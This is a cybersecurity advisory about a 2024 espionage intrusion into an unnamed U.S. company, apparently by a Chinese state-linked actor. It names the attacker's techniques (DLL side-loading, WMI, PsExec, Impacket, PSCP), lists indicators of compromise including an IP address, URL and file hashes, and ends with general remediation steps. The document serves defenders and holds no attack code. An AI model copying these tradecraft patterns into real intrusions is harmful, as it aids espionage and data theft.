Analysis Summary

Earlier this year, a four-month infiltration by a suspected Chinese threat actor targeted a major U.S. company. Researchers said that the malicious activity was first discovered on April 11, 2024, and persisted until August. They do not, however, discount the chance that the intrusion might have happened sooner.

The researchers said, “The attackers moved laterally across the organization's network, compromising multiple computers.”

Exchange Servers were among the systems targeted, indicating that the attackers were using email harvesting to obtain intelligence. Additionally, exfiltration techniques were used, indicating that specific information was stolen from the companies. Although it was mentioned that the victim has a sizable following in China, the name of the organization that was affected by the ongoing attack campaign was not revealed.

The usage of DLL side-loading, a tactic that is popular among several Chinese threat groups, and the existence of artifacts that have been previously linked to a state-sponsored operation codenamed Crimson Palace are the reasons for the connections to China as the possible culprits. It is also noteworthy that in 2023, an attacker who may have been associated with another hacker collective located in China, Daggerfly—also known as Bronze Highland, Evasive Panda, and StormBamboo—targeted the company.

The attack uses living-off-the-land (LotL) programs including Windows Management Instrumentation (WMI), PsExec, and PowerShell, as well as open-source tools like FileZilla, Impacket, and PSCP, in addition to DLL side-loading to execute malicious payloads. At this point, it is unknown exactly which first access method was used to compromise the network. Nevertheless, the investigation revealed that the machine containing the first signs of infiltration had a command executed via WMI from another networked system.

Given that the command came from a different system on the network, it is possible that the intrusion started before April 11 and that the attackers had already infiltrated at least one other machine on the organization's network. Other malicious actions that the attackers later carried out included downloading programs like FileZilla, PSCP, and WinRAR, attacking Microsoft Exchange servers, stealing credentials, and running malicious DLL files.

Impact

• Data Exfiltration
• Sensitive Data Theft
• Cyber Espionage
• Command Execution

Indicators of Compromise

IP

• 149.28.154.23

MD5

• 078d72a61fe3de477669fcf07ef66fb3
• db89ec570e6281934a5c5fcf7f4c8967

SHA-256

• c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0
• edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef

SHA1

• ad53700ca78f887ef6fdd0d2cfcc570c107675e2
• 0098c79e1404b4399bf0e686d88dbf052269a302

URL

• http://149.28.154.23:443/

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Ensure that all software, particularly those from third-party vendors, are obtained from trusted sources and that updates are obtained from the vendor’s official website or app store.
• Conduct regular security assessments and audits of all software, especially those that handle sensitive data, to detect any suspicious activities.
• Implement multi-factor authentication and strong password policies to prevent unauthorized access to sensitive systems and data.
• Train employees on best practices for identifying and reporting suspicious activities, such as phishing emails or unusual network traffic.
• Deploy endpoint protection solutions with advanced threat detection capabilities to identify and block any malicious activities.
• Implement network segmentation and access controls to limit the spread of malware in case of a successful attack.
• Monitor network traffic and system logs to detect any unusual or suspicious activities, such as unauthorized file transfers or unusual process execution.
• Develop an incident response plan that outlines the steps to be taken in case of a successful attack, including how to isolate and contain the affected systems and how to communicate with stakeholders, such as customers and regulatory bodies.